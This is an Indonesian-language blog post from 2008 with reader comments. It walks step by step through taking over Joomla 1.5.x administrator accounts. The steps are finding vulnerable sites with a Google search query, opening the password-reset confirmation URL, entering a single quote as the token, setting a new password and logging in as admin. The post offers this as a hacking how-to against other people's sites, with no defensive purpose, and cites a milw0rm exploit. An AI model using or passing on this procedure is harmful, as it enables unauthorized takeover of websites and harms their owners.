Joomla 1.5.x Remote Admin Password Change

1. Seperti biasa buka uncle google masukin keyword inurl:/com_user/models/
wow targetna banyak euy….
2. Tambahkan di url web target menjadi
www.webtarget.com/index.php?option=com_user&view=reset&layout=confirm
3. Masukin token char ‘ klik OK
4. Buat password baru
5. Ganti URL web target jadi www.webtarget.com/administrator
6. Login user admin password sesuai dengan pass yang tadi kamu buat
7. Terserah dirimu lah….
8. Kopi habis tidur dulu ah….

referensi : http://milw0rm.org/exploits/6234

Tulisan ini dikirim pada pada Minggu, November 23rd, 2008 3:00 pm dan di isikan dibawah Hacking. Anda dapat meneruskan melihat respon dari tulisan ini melalui RSS 2.0 feed. Anda dapat merespon, or trackback dari website anda.

4 Tanggapan ke “Joomla 1.5.x Remote Admin Password Change”

  1. gantengs Berkata:
    Januari 7, 2009 pukul 12:50 pm

    masukin token char ‘ mxdnya apa sih??

  2. iwan Berkata:
    Januari 7, 2009 pukul 1:18 pm

    maksudnya masukin token char ‘ untuk membypass password admin jadi kita bisa masukin password baru gitu bro
    coba baca aja biar lebih jelas di http://milw0rm.org/exploits/6234

  3. menofwar Berkata:
    Mei 3, 2009 pukul 9:41 am

    kok g bs knp,.??

  4. iwan Berkata:
    Mei 3, 2009 pukul 11:25 am

    udah di patch kali bug nya

Tinggalkan Balasan